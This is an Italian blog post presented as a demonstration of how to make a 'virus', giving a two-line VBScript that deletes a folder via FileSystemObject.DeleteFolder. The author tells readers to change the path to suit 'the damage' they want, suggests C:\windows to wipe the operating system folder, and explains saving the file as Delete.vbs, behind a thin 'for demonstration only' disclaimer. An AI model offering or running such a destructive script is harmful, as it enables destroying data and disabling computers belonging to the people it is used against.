Cancellare una cartella tramite script

Oggi darò una piccola dimostrazione su come utilizzare gli script in modo diverso..... avete presente i virus....? Avete mai pensato di crearne uno...????? Ovviamente è solo a scopo dimostrativo e divulgativo, perchè vi ricordo che l'informazione è di tutti, poi l'uso che se ne fa è a prescindere e dipende dalla persona.
Quello che ci serve è un editor di testo, quindi il blocco note va benissimo..!!
Il seguente script serve a cancellare una cartella qualsiasi del pc, infatti evidenzierò la directory relativa alla cartella in rosso, in modo tale da poterla cambiare senza alterare il codice a secondo del danno e dell'utility che ne vogliamo trarre!

Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFolder("C:\x")


Se ad esempio vogliamo cancellare la cartella contenente il sistema operativo, la directory sarà la seguente: C:\windows quindi basta cambiare la lettera x col vostro percorso.
A questo punto basta copiare il codice in grassetto e cambiare la directory come nell'esempio per poi salvare con nome aggiungendo .vbs
Faccio un esempio:
Salva con nome - Delete.vbs
Condividi su Google Plus

Info su Giovanni Di Mauro

Questa è una breve descrizione nel blocco dell'autore sull'autore. Lo modifichi inserendo il testo su "Informazioni biografiche" nel pannello di amministrazione dell'utente.
    Commenti da Blogger
    Commenti da Facebook

0 commenti :

Posta un commento